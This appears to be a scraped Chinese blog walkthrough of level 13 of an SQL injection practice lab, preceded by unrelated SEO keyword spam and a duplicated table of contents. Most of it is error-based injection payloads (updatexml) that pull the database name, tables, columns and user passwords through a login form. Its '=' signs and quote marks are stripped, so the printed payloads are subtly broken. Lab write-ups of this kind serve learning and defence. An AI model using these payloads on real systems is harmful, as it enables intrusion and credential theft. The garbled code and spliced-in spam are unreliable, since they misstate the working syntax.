招商网站建设免费,超市网站怎么做的,中国空间站官网,吉林网络公司网站建设文章目录 前言一、回顾第十二关知识点二、靶场第十三关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息 总结 前言
此文章只用于学习和反思巩固sql注入知识#xff0c;禁止用于做非法攻击。注意靶场是可以练习的平台#xff0c;… 文章目录 前言一、回顾第十二关知识点二、靶场第十三关通关思路1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息 总结 前言
此文章只用于学习和反思巩固sql注入知识禁止用于做非法攻击。注意靶场是可以练习的平台不能随意去尚未授权的网站做渗透测试 一、回顾第十二关知识点
通过第十二关的学习我们了解到post注入的基本流程其实和get注入相差不大只是注入的地方不一样罢了。
二、靶场第十三关通关思路
1、判断注入点2、爆显位3、爆数据库名4、爆数据库表5、爆数据库列6、爆数据库关键信息
1、判断注入点
老规矩还是使用万能语句1 or 11 和 1 or 12发现页面正常所以排除数字型。输入1发现报错报错信息为 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’) and password(‘’) LIMIT 0,1’ at line 1 通过报错信息可以猜测应该是单引号加括号闭合这里我们试一下构造payload
1) or 11#1) or 12#发现11页面正常12页面异常细心发现页面正常异常没有返回回显内容所以不能用联合查询了。可以试一试报错注入或者是布尔盲注我个人喜欢用报错注入。(如图所示)
2、爆显位
注入语句为
1) order by 3#发现3报错那么显位是2
3、爆数据库名
注入语句为
1) or updatexml(1,concat(0x3a,(select database()),0x3a),1)#得数据库名
4、爆数据库表
注入语句为
1) and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1),0x3a),1)#得到关键表名users
5、爆数据库列
注入语句为
1) and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),0x3a),1)#1) and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 2,1),0x3a),1)#得到列名usernamepassword
6、爆数据库关键信息
注入语句为
1) and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#1) and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#得到关键信息 总结
这一关用的是报错注入布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的大佬路过请多指教
